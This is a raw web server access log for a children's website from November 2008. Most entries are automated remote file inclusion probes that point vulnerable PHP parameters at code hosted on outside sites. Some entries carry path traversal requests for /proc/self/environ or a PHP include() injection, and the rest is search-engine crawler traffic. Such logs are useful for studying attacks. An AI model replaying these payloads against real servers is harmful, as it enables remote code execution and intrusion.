64.1.215.165 - - [20/Nov/2008:00:04:07 -0700] "GET /images/kidsphotos/?D=D HTTP/1.0" 200 1107 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
69.73.138.140 - - [20/Nov/2008:00:04:51 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://dld.go.th/info.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
94.102.60.45 - - [20/Nov/2008:00:05:11 -0700] "GET /images/movieposters/_vti_cnf/ HTTP/1.1" 200 1038 www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
94.102.60.45 - - [20/Nov/2008:00:05:11 -0700] "GET /images/movieposters/_vti_cnf/?N=D HTTP/1.1" 200 1038 www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
94.102.60.45 - - [20/Nov/2008:00:05:11 -0700] "GET /images/movieposters/_vti_cnf/?M=A HTTP/1.1" 200 1038 www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
94.102.60.45 - - [20/Nov/2008:00:05:12 -0700] "GET /images/movieposters/_vti_cnf/?S=A HTTP/1.1" 200 1038 www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
94.102.60.45 - - [20/Nov/2008:00:05:12 -0700] "GET /images/movieposters/_vti_cnf/?D=A HTTP/1.1" 200 1038 www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
94.23.10.29 - - [20/Nov/2008:00:06:33 -0700] "GET /logs/access_log.old%20%20//include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:00:07:42 -0700] "GET //include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:00:07:42 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:00:07:42 -0700] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
212.34.174.106 - - [20/Nov/2008:00:10:07 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:10:07 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:10:08 -0700] "GET /logs/access_log.old%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:12:19 -0700] "GET /logs/access_log.old%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:12:26 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:12:36 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:00:13:35 -0700] "GET /logs/access_log.old//include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
38.99.44.103 - - [20/Nov/2008:00:16:29 -0700] "GET /ads/fullpage/_vti_cnf/?S=D HTTP/1.0" 200 768 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
38.99.44.103 - - [20/Nov/2008:00:17:37 -0700] "GET /images/movieposters/calendar.htm HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
219.85.63.226 - - [20/Nov/2008:00:20:06 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "-"
219.85.63.226 - - [20/Nov/2008:00:20:06 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "-"
203.231.35.38 - - [20/Nov/2008:00:20:42 -0700] "GET /logs/access_log.old%20%20//include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
72.94.249.34 - - [20/Nov/2008:00:23:53 -0700] "GET / HTTP/1.1" 200 1047 www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "-"
85.214.19.243 - - [20/Nov/2008:00:24:24 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://vcd.co.uk/includes/safe.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
85.214.19.243 - - [20/Nov/2008:00:24:24 -0700] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://vcd.co.uk/includes/safe.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
208.83.106.201 - - [20/Nov/2008:00:25:36 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.ts-telecom.eu/joomla/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "-"
72.30.87.109 - - [20/Nov/2008:00:28:03 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.87.109 - - [20/Nov/2008:00:28:04 -0700] "GET /images/parks/?N=A HTTP/1.0" 200 1717 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
85.214.19.243 - - [20/Nov/2008:00:28:31 -0700] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://vcd.co.uk/includes/safe.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
85.214.19.243 - - [20/Nov/2008:00:29:49 -0700] "GET /logs/access_log.old//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://vcd.co.uk/includes/safe.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:00:30:26 -0700] "GET /logs/access_log.old//include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:00:36:07 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:00:36:07 -0700] "GET /logs/access_log.old//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:00:36:07 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:00:36:18 -0700] "GET /logs/error_log.old//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:00:39:11 -0700] "GET /logs/access_log.old//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:00:41:37 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:00:41:37 -0700] "GET /logs/access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:00:41:37 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:00:41:37 -0700] "GET /logs/error_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
85.214.19.243 - - [20/Nov/2008:00:41:48 -0700] "GET /logs/access_log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://vcd.co.uk/includes/safe.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
85.214.19.243 - - [20/Nov/2008:00:41:48 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://vcd.co.uk/includes/safe.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:00:42:35 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
213.165.87.57 - - [20/Nov/2008:00:42:35 -0700] "GET /logs/access_log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
213.165.87.57 - - [20/Nov/2008:00:42:35 -0700] "GET /logs/error_log.old%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
213.165.87.57 - - [20/Nov/2008:00:42:39 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "-"
213.165.87.57 - - [20/Nov/2008:00:42:39 -0700] "GET /logs/error_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "-"
213.165.87.57 - - [20/Nov/2008:00:42:39 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "-"
213.165.87.57 - - [20/Nov/2008:00:42:45 -0700] "GET /logs/access_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "-"
213.165.87.57 - - [20/Nov/2008:00:42:47 -0700] "GET /logs/error_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.61 (Macintosh; I; PPC)" "-"
213.165.87.57 - - [20/Nov/2008:00:42:47 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.61 (Macintosh; I; PPC)" "-"
213.165.87.57 - - [20/Nov/2008:00:42:47 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.61 (Macintosh; I; PPC)" "-"
213.165.87.57 - - [20/Nov/2008:00:42:52 -0700] "GET /logs/access_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.61 (Macintosh; I; PPC)" "-"
69.73.133.74 - - [20/Nov/2008:00:43:07 -0700] "GET /logs/access_log.old//skin/zero_vote/ask_password.php?dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
69.73.133.74 - - [20/Nov/2008:00:43:07 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
69.73.133.74 - - [20/Nov/2008:00:43:07 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
69.73.133.74 - - [20/Nov/2008:00:43:31 -0700] "GET /logs/access_log//skin/zero_vote/ask_password.php?dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
89.108.66.227 - - [20/Nov/2008:00:44:41 -0700] "GET /logs/error_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
89.108.66.227 - - [20/Nov/2008:00:44:42 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
89.108.66.227 - - [20/Nov/2008:00:44:43 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
72.30.87.125 - - [20/Nov/2008:00:44:55 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.87.125 - - [20/Nov/2008:00:45:00 -0700] "GET /ads/_vti_cnf/ HTTP/1.0" 200 606 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
213.165.87.57 - - [20/Nov/2008:00:45:03 -0700] "GET /logs/access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.61 (Macintosh; I; PPC)" "-"
213.165.87.57 - - [20/Nov/2008:00:45:05 -0700] "GET /logs/access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "-"
89.108.66.227 - - [20/Nov/2008:00:45:48 -0700] "GET /logs/access_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
213.165.87.57 - - [20/Nov/2008:00:46:19 -0700] "GET /logs/error_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
213.165.87.57 - - [20/Nov/2008:00:46:20 -0700] "GET /logs/access_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [20/Nov/2008:00:49:09 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
222.233.52.18 - - [20/Nov/2008:00:49:10 -0700] "GET /logs/error_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
222.233.52.18 - - [20/Nov/2008:00:49:10 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
222.233.52.18 - - [20/Nov/2008:00:49:25 -0700] "GET /logs/access_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
212.34.174.106 - - [20/Nov/2008:00:49:47 -0700] "GET /logs/access_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:49:47 -0700] "GET /logs/access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:00:50:54 -0700] "GET /logs/access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.0.147 - - [20/Nov/2008:00:52:23 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
94.23.0.147 - - [20/Nov/2008:00:52:23 -0700] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
94.23.0.147 - - [20/Nov/2008:00:52:23 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
94.23.0.147 - - [20/Nov/2008:00:52:23 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
94.23.0.147 - - [20/Nov/2008:00:52:23 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
94.23.0.147 - - [20/Nov/2008:00:52:23 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
94.23.0.147 - - [20/Nov/2008:00:52:23 -0700] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
94.23.0.147 - - [20/Nov/2008:00:52:24 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
222.233.52.18 - - [20/Nov/2008:00:53:08 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [20/Nov/2008:00:53:09 -0700] "GET /logs/error_log.old%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [20/Nov/2008:00:53:09 -0700] "GET /logs/access_log.old%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
64.34.166.205 - - [20/Nov/2008:00:53:37 -0700] "GET ///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Avant Browser (http://www.avantbrowser.com)" "-"
64.34.166.205 - - [20/Nov/2008:00:53:37 -0700] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Avant Browser (http://www.avantbrowser.com)" "-"
87.106.245.44 - - [20/Nov/2008:00:54:07 -0700] "GET /appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:00:54:07 -0700] "GET /logs/error_log.old%20%20/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:00:54:07 -0700] "GET /logs/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:00:54:16 -0700] "GET /logs/error_log.old%20%20/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:00:54:16 -0700] "GET /logs/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:00:54:17 -0700] "GET /appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
212.34.174.106 - - [20/Nov/2008:00:54:38 -0700] "GET /logs/access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:54:49 -0700] "GET /logs/access_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:00:56:02 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:00:56:02 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [20/Nov/2008:00:57:05 -0700] "GET /logs/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
